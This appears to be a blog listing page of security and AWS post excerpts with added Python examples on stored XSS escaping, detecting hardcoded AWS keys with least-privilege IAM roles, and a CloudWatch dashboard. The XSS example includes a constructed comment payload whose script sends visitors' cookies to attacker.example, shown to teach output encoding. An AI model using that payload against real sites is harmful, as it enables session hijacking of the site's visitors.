by Ross Oliver | Technical Consultant at Taos

October is Cyber Security Awareness month (https://www.dhs.gov/national-cyber-security-awareness-month), and Halloween being the major holiday in October has never seemed more appropriate. No ghost, witch, or goblin can be as scary as the cyber security events of this month. October 3rd: Yahoo upgraded its 2013 breach to include every […]
Cross-site scripting (XSS) attacks are among the more insidious forms of malicious Internet activity, because visitors to a legitimate website can become victims without any direct compromise of the site’s servers, and often without the site operator’s knowledge. Defending against such attacks can be difficult, but a feature built into newer web browsers adds a significant defensive tool against XSS.
A quick review: an XSS attack occurs when an attacker is able to insert malicious content, typically script, into a legitimate website’s pages. The goal is to exploit the legitimacy of the targeted site to deliver that content to other visitors, whose browsers then run it with the site’s own privileges (its cookies, its page contents, requests made in its name). The areas of a site most often targeted are discussion forums and comment sections: areas specifically intended to receive input from one visitor and display it to many others.
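The comment-section scenario above, as an added example that is not code from the original post: a stored comment rendered straight into the page beside the same comment rendered with output encoding, plus the one context where encoding alone is not enough. The comment text, template and attacker hostname are constructed for illustration.

```python
"""Stored XSS through a comment section: vulnerable rendering beside the
escaped form, plus the link-context caveat.

Added example for this page; not code from the original post. The comment
text, template and attacker hostname are constructed for illustration.
"""
import html
from urllib.parse import urlsplit

# Constructed hostile comment: the visible text looks friendly, the <script>
# would ship every later reader's cookies to the attacker's host.
HOSTILE_COMMENT = (
    'Great post!<script>'
    'new Image().src="https://attacker.example/c?"+document.cookie;'
    '</script>'
)

COMMENT_TEMPLATE = '<div class="comment"><p>{body}</p></div>'


def render_comment_unsafe(comment):
    """Vulnerable: drops the stored comment into the page as-is.

    The browser cannot tell the attacker's markup from the site's own, so the
    script runs in the site's origin for every visitor who loads the thread.
    """
    return COMMENT_TEMPLATE.format(body=comment)


def render_comment_safe(comment):
    """Hardened: HTML-encode the comment at output time.

    html.escape turns & < > " ' into entities, so the browser renders the
    payload as literal text. Encode when writing to the page, not on input,
    so the stored data stays usable in other contexts (e-mail, JSON, ...).
    """
    return COMMENT_TEMPLATE.format(body=html.escape(comment, quote=True))


def has_live_script(rendered):
    """True if a real <script> tag survives in the rendered HTML."""
    return "<script" in rendered.lower()


ALLOWED_LINK_SCHEMES = {"http", "https"}


def safe_href(user_url):
    """Escaping is not enough for every context: an escaped javascript: URL is
    still a javascript: URL once it becomes the href of a link. Allow-list the
    scheme first, then escape for the attribute. Returns None when rejected."""
    scheme = urlsplit(user_url.strip()).scheme.lower()
    if scheme not in ALLOWED_LINK_SCHEMES:
        return None
    return html.escape(user_url, quote=True)


def render_thread(comments, safe=True):
    """Render a list of stored comments the way a forum page would."""
    render = render_comment_safe if safe else render_comment_unsafe
    return "\n".join(render(c) for c in comments)


if __name__ == "__main__":
    print(render_thread(["hi", HOSTILE_COMMENT], safe=False))
    print(render_thread(["hi", HOSTILE_COMMENT]))
```

The two renderers differ by a single call, which is the point: the fix belongs at the place where untrusted data meets HTML, and it must match that place (text node, attribute, URL), which is why `safe_href` checks the scheme before escaping.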
October is Cyber Security Awareness month, and it got off to an exciting start with major new security breaches at Experian, Scottrade, and Trump Hotels. Many of us in the IT world deal with security on a daily basis, but others in our communities may not have the same expertise. Take the opportunity this month to reach out and help educate the non-IT communities.
Breaker breaker, are you required to have a “special” character in your password? Thank the UNIX password system of the 1970s, also the time of the CB radio craze in the BC (Before Cellphones) epoch.
The Web as we know it today started primarily on UNIX computers, and in the earliest days, web site accounts often were actual UNIX accounts. Shortcomings of the original UNIX password system included:
It’s the beginning of a New Year, time to make those New Year’s resolutions: lose weight, eat more vegetables, write that novel, travel to Europe, get that colonoscopy, etc. But as we all know, doing new things is hard; perhaps stopping things we are already doing is easier, a sort of Anti-Resolution. So I propose these anti-resolutions for IT professionals in 2015:
Stop generating non-actionable alerts: How many alerts have you ignored or deleted from your inbox today? “Alert Fatigue” is a common operations malady. Not only does it waste time and attention, but it can also drown out the relevant alerts that need real attention. This is one of the easiest anti-resolutions: just turn them off.
Stop asking stupid security questions: Commonly used as an attempt to reduce password reset requests or as a cost-saving substitute for multi-factor authentication, security questions fail because people are no better at remembering the answers than their passwords. “What was the name of your first pet?” is a question I would have a hard time answering the first time, let alone later when I needed to reset my password.
The Amazon AWS service API is an essential tool for automating the deployment, monitoring, and management of AWS resources. To grant programs the necessary API access, a common technique is to create AWS access keys and store them in configuration files, or even hardcoded into source code. I employed this method in last month’s installment, Implementing A Custom AWS Dashboard.
However, using keys in this way adds a security risk. Keys stored in configuration files or source code are at risk of unauthorized disclosure, and such keys usually grant far broader access than a particular task needs (root-account keys grant unrestricted access to every AWS function in the account). AWS Identity and Access Management (IAM) roles offer a solution to both problems.
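Both halves of the problem above, as an added example rather than the post’s own code: a check that catches the access-key pattern pasted into a config file, and the pair of IAM policy documents that replace it with a role an EC2 instance can assume, scoped to read-only CloudWatch calls. The config text is constructed (the key ID is AWS’s documented placeholder key), and the policy names and actions are assumptions chosen for a monitoring task.

```python
"""Hardcoded AWS access keys in config versus an IAM role with a scoped policy.

Added example for this page, not the post's own code. The config text is
constructed (the key ID is AWS's documented placeholder); the policies are
assumptions chosen for a read-only monitoring task.
"""
import json
import re

# Constructed sample config: the pattern the post warns against.
SAMPLE_CONFIG = """\
[default]
region = us-west-2
# keys pasted in by a developer in a hurry
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""

# Long-term access key IDs start with AKIA, temporary ones with ASIA; both are
# 20 characters. The look-arounds stop us matching inside longer tokens.
ACCESS_KEY_ID_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
SECRET_KEY_LINE_RE = re.compile(r"aws_secret_access_key\s*=\s*(\S+)", re.IGNORECASE)


def find_hardcoded_keys(text):
    """Return (line_number, kind, value) for every credential found in text.

    Suitable for a pre-commit hook or a sweep over a config tree.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_ID_RE.finditer(line):
            hits.append((lineno, "access_key_id", m.group(0)))
        m = SECRET_KEY_LINE_RE.search(line)
        if m:
            hits.append((lineno, "secret_access_key", m.group(1)))
    return hits


def ec2_trust_policy():
    """Trust policy: lets EC2 (via an instance profile) assume the role, so the
    program gets short-lived credentials from instance metadata instead of a
    key pasted into a file."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"Service": "ec2.amazonaws.com"},
            "Action": "sts:AssumeRole",
        }],
    }


def dashboard_reader_policy():
    """Permission policy scoped to what a read-only metrics task needs.
    CloudWatch metric actions do not support resource-level restrictions,
    so Resource must be "*"; the Action list carries the restriction."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "ReadMetricsOnly",
            "Effect": "Allow",
            "Action": ["cloudwatch:GetMetricStatistics", "cloudwatch:ListMetrics"],
            "Resource": "*",
        }],
    }


def policy_is_least_privilege(policy):
    """Reject Allow statements that grant wildcard actions ("*" or "svc:*"),
    the 'all your account's functions' problem in a single check."""
    for st in policy["Statement"]:
        actions = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
        if st["Effect"] == "Allow" and any(a == "*" or a.endswith(":*") for a in actions):
            return False
    return True


def policy_json(policy):
    """Render a policy as the JSON the IAM console or CLI accepts."""
    return json.dumps(policy, indent=2)


def make_cloudwatch_client():
    """With the role attached, no keys appear anywhere: boto3 walks its
    credential chain and finds the role's temporary credentials in instance
    metadata. Imported lazily so the rest of this file runs without boto3."""
    import boto3
    return boto3.client("cloudwatch")


if __name__ == "__main__":
    for lineno, kind, value in find_hardcoded_keys(SAMPLE_CONFIG):
        print(f"line {lineno}: hardcoded {kind}: {value}")
    print(policy_json(ec2_trust_policy()))
    print(policy_json(dashboard_reader_policy()))
```

Attach the role to the instance as an instance profile and the `boto3.client("cloudwatch")` call needs no credentials at all; rotating or revoking access then happens in IAM, not by hunting through config files.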
The Internet domain name is the heart of your organization’s Internet identity. However, domain registration has become commoditized and inexpensive, so many organizations fail to adequately protect their most important Internet asset.
CloudWatch is an Amazon Web Services (AWS) service that automatically collects a wide range of performance and health data about your AWS resources. This data is available through an API, and can also be viewed as graphs on the AWS console. However, the graphs are located on the separate console pages for each type of resource (e.g. EC2, RDS, load balancer, etc.), so the console offers no single dashboard view spanning multiple AWS resources.
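The step a custom dashboard has to perform itself, as an added example that is not the post’s own dashboard code: query the same CloudWatch API for metrics that live in different namespaces (EC2, RDS, ELB) and line up the newest datapoint of each in one table. The instance, database and load balancer names are made up, and `FakeCloudWatch` stands in for `boto3.client("cloudwatch")` so the code runs offline; with the real client the `get_metric_statistics` calls are unchanged.

```python
"""One table from metrics spread across several CloudWatch namespaces.

Added example for this page, not the post's own dashboard code. Resource
identifiers are constructed; FakeCloudWatch mimics boto3's GetMetricStatistics
response shape so the code runs offline.
"""
from datetime import datetime, timedelta, timezone

# One row per resource: (label, namespace, metric, dimensions, statistic).
# Namespaces, metric names and dimension keys are CloudWatch's real ones;
# the resource identifiers are made up.
DASHBOARD_ROWS = [
    ("web-1 CPU", "AWS/EC2", "CPUUtilization",
     [{"Name": "InstanceId", "Value": "i-0123456789abcdef0"}], "Average"),
    ("orders-db CPU", "AWS/RDS", "CPUUtilization",
     [{"Name": "DBInstanceIdentifier", "Value": "orders-db"}], "Average"),
    ("web-elb 5xx", "AWS/ELB", "HTTPCode_Backend_5XX",
     [{"Name": "LoadBalancerName", "Value": "web-elb"}], "Sum"),
]


def fetch_latest(client, namespace, metric, dimensions, statistic,
                 end=None, minutes=15, period=300):
    """Query the last `minutes` of one metric and return the newest datapoint as
    (value, unit, timestamp), or None when CloudWatch returned no data."""
    end = end or datetime.now(timezone.utc)
    resp = client.get_metric_statistics(
        Namespace=namespace,
        MetricName=metric,
        Dimensions=dimensions,
        StartTime=end - timedelta(minutes=minutes),
        EndTime=end,
        Period=period,
        Statistics=[statistic],
    )
    points = resp.get("Datapoints", [])
    if not points:
        return None
    newest = max(points, key=lambda p: p["Timestamp"])  # datapoints arrive unordered
    return newest[statistic], newest.get("Unit", ""), newest["Timestamp"]


def build_dashboard(client, rows=DASHBOARD_ROWS, now=None):
    """Return one dict per row. A sparse metric (ELB 5xx with no errors) yields
    no datapoints at all, so 'no data' is kept distinct from zero."""
    now = now or datetime.now(timezone.utc)
    table = []
    for label, ns, metric, dims, stat in rows:
        latest = fetch_latest(client, ns, metric, dims, stat, end=now)
        if latest is None:
            table.append({"label": label, "value": None, "unit": "", "age_s": None})
            continue
        value, unit, ts = latest
        table.append({"label": label, "value": value, "unit": unit,
                      "age_s": int((now - ts).total_seconds())})
    return table


def format_dashboard(table):
    """Plain-text rendering; swap for HTML or a graphing library as needed."""
    lines = []
    for row in table:
        if row["value"] is None:
            lines.append(f"{row['label']:<16} no data")
        else:
            lines.append(f"{row['label']:<16} {row['value']:>8} {row['unit']:<8} ({row['age_s']}s ago)")
    return "\n".join(lines)


class FakeCloudWatch:
    """Offline stand-in for boto3.client("cloudwatch") with canned responses in
    the shape GetMetricStatistics returns."""

    def __init__(self, now):
        self.canned = {
            ("AWS/EC2", "CPUUtilization"): [
                {"Timestamp": now - timedelta(minutes=10), "Average": 41.0, "Unit": "Percent"},
                {"Timestamp": now - timedelta(minutes=5), "Average": 57.5, "Unit": "Percent"},
            ],
            ("AWS/RDS", "CPUUtilization"): [
                {"Timestamp": now - timedelta(minutes=5), "Average": 12.25, "Unit": "Percent"},
            ],
            ("AWS/ELB", "HTTPCode_Backend_5XX"): [],  # no errors -> no datapoints
        }

    def get_metric_statistics(self, **kwargs):
        key = (kwargs["Namespace"], kwargs["MetricName"])
        return {"Label": kwargs["MetricName"], "Datapoints": list(self.canned.get(key, []))}


def run_demo():
    """Build the table against the fake client at a fixed time (constructed)."""
    now = datetime(2014, 11, 1, 12, 0, tzinfo=timezone.utc)
    return build_dashboard(FakeCloudWatch(now), now=now)


if __name__ == "__main__":
    print(format_dashboard(run_demo()))
```

Replace `FakeCloudWatch(now)` with `boto3.client("cloudwatch")` and the same `build_dashboard` call fans out one `GetMetricStatistics` request per row; the `age_s` column is worth keeping, since a stale datapoint is the first sign that a resource has stopped reporting.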